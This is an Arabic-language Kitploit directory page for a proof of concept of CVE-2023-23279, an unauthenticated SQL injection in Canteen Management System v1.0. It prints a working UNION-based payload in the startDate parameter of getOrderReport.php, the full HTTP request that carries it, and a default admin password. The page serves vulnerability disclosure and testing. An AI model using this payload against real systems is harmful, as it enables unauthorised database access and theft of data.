Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-23279 — إثبات مفهوم لثغرة حقن SQL غير مصادق عليها (CVSS 9.8) في نظام إدارة الكافيتريا v1.0، تمكّن من استخراج البيانات عن بُعد عبر نقطة النهاية getOrderReport.php. | Kitploit
أدوات/GitHubGitHub/tuannq2299/cve-2023-23279
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubtuannq2299/cve-2023-23279

CVE-2023-23279

إثبات مفهوم لثغرة حقن SQL غير مصادق عليها (CVSS 9.8) في نظام إدارة الكافيتريا v1.0، تمكّن من استخراج البيانات عن بُعد عبر نقطة النهاية getOrderReport.php.

عرض المستودع
1منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

ثغرة حقن SQL في نظام إدارة الكافتيريا الإصدار 1.0.

مؤلف الثغرة: Tuannq

تاريخ الاكتشاف: 5/1/2023 المورد: https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html

حساب تسجيل الدخول: [email protected]/rootadmin (حساب المسؤول الفائق)

ملف الثغرة: /php_action/getOrderReport.php

موقع الثغرة: /php_action/getOrderReport.php، startDate

CVSS 3.0: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

الحمولة: startDate=2023-01-05'+UNION+ALL+SELECT+4406,CONCAT(0x716a627a71,IFNULL(CAST(table_name+AS+NCHAR),0x20),0x716a6a7071),4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema+IN+(0x796f757468617070616d)--+-

root@kitploit:~
POST /youthappam/php_action/getOrderReport.php HTTP/1.1
Host: localhost
Content-Length: 297
Cache-Control: max-age=0
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="104"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://localhost/youthappam/report.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

startDate=2023-01-05'+UNION+ALL+SELECT+4406,CONCAT(0x716a627a71,IFNULL(CAST(table_name+AS+NCHAR),0x20),0x716a6a7071),4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema+IN+(0x796f757468617070616d)--+-&endDate=2023-01-06

يمكن إرسال الطلب بواسطة مستخدم غير مصادق، ولهذا السبب، فإن درجة CVSS لهذه الثغرة هي 9.8

PoC

تحليل الكود المصدري

تم تمرير قيمة معامل startDate إلى استعلام SQL وتنفيذها دون أي تنقية.

تنزيل الأداة